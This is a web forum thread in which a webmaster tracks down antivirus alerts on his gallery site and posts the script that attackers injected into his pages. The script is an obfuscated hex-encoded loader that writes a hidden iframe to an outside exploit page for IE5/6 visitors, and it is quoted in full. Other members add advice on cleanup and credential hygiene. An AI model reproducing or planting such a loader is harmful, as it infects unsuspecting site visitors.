Virus Alert?

[Toby]

I've gotten a couple of reports from other webmasters that their AV software is tripping when they load the submit page on Well Heeled Women. http://www.well-heeled-women.com/cgi-bin/tgp/submit.cgi

Others have reported no alerts, and I can find nothing in the code that's not supposed to be there.

Is this page setting off alarms for anyone else? Even if it's a false positive I'd like to determine the cause so I can eliminate the issue.

If you do get an alert, please post what OS, AV and browser you are using.

Thanks

[CrazySy]

Loaded your page with no problem.

[Bill]

I got no alert.

[Useless]

It was fine here, Toby. XP Media, AVG, FF and IE.

[Toby]

The two reports I've received so far have both been from webmasters in Europe. Still waiting to hear back what OS, AV and browser combos they were using.

[spacemanspiff]

No problems here.

[Twiceshy]

no problem loading the page here

[NY Jester]

No problems Here Toby, XP -Sp2 , IE 7 EZ Armor and Counter Spy

[LeRoy]

When I went to the site. My virus warning come up.

I took a picture of my laptop. I took it quick sorry about the poor quality.

If this helps I entered your site through the recip on your submit page. Then it took me to your warning page. When I entered the site I got the virus pop up.

Hope everything is ok

[Toby]

Quote:

Originally Posted by D2222

When I went to the site. My virus warning come up.

I took a picture of my laptop. I took it quick sorry about the poor quality.

If this helps I entered your site through the recip on your submit page. Then it took me to your warning page. When I entered the site I got the virus pop up.

Hope everything is ok

Hmmm, so no alert on the submit or on the warning, but an alert on the main gallery page.

What OS, AV and browser? and did the alert give any indication of what it had detected?

[Toby]

** UPDATE **

I found the problem, in the process of cleaning files now. Not sure yet how they got access. Here's the code that was inserted. I'm not sure what it does.

Code:

<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E6272656173746F6273657373696F6E2E636F6D2F73742F7A2F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37);  o=o+c+s.substr(i,2);} var v=navigator.appVersion; if (v.indexOf('MSIE 6.0') != -1){document.write(unescape(o));}if (v.indexOf('MSIE 5.') != -1){document.write(unescape(o));}</script>

[Toby]

more info:

It's inserts an IFRAME that links to a page with a pretty nasty ActiveX exploit. The code was added to any of my TGP script generated pages across four different domains, a different TGP script on fifth domain on the same box was unaffected.

It seems that a hole in my trade script was the initial access point. They were literally minutes ahead of me updating the trade script to a more secure version.

Give me about 20 minutes in a locked room with the asshat(s) responsible.

[LeRoy]

Shoot I'm late getting back to this thread . I was too shy to ICQ you last night

Glad everything is ok. Sorry about the delay in getting the info.

[bluebrit]

Hi Toby. Are you certain you got it all? I just took a quick look at the code you posted and it only seems to target IE5 & 6.

That still leaves IE7, Netscape, Opera etc. It seems strange that someone would hack you for that and not include more code to cover all the other browser types as well.

Just a thought and I hope I'm wrong.

[Toby]

I noticed that in the code too. I think it specifically attacked IE5 and IE6 browsers because they're the ones susceptible to the ActiveX exploit on the redirect URL. That also makes it less likely to be detected right away by the webmaster, since most of us keep our own stuff updated.

I've been through all my sites file by file and am pretty sure I've got it all. I'd already updated the trade script that had the security hole that allowed them access.

I was literally minutes late getting the update installed (released that same afternoon). Time stamp on the uploaded files for the update was 9:02 PM. Time stamp on the modified hack files was 8:50 PM.

[cd34]

That virus is added through an FTP account. What makes this one bad is that they have access to the site, go in and modify precisely the few files needed with no errors or password violations, and, after you change it, in a few days they go back.

Change your password, make sure that every time you give your password to a vendor that you change it afterwards. Or, change it before giving it to a vendor and change it back.

Of the exploits we see, about 80% are through poorly coded php, 15% are through spyware/keyloggers/passwords that are given out to someone that has spyware/keylogger. And every 14-18 months, a certain credit card processor that stores passwords in the clear for all of the FTP accounts that they maintain for clients that run a membership site has all of their passwords stolen.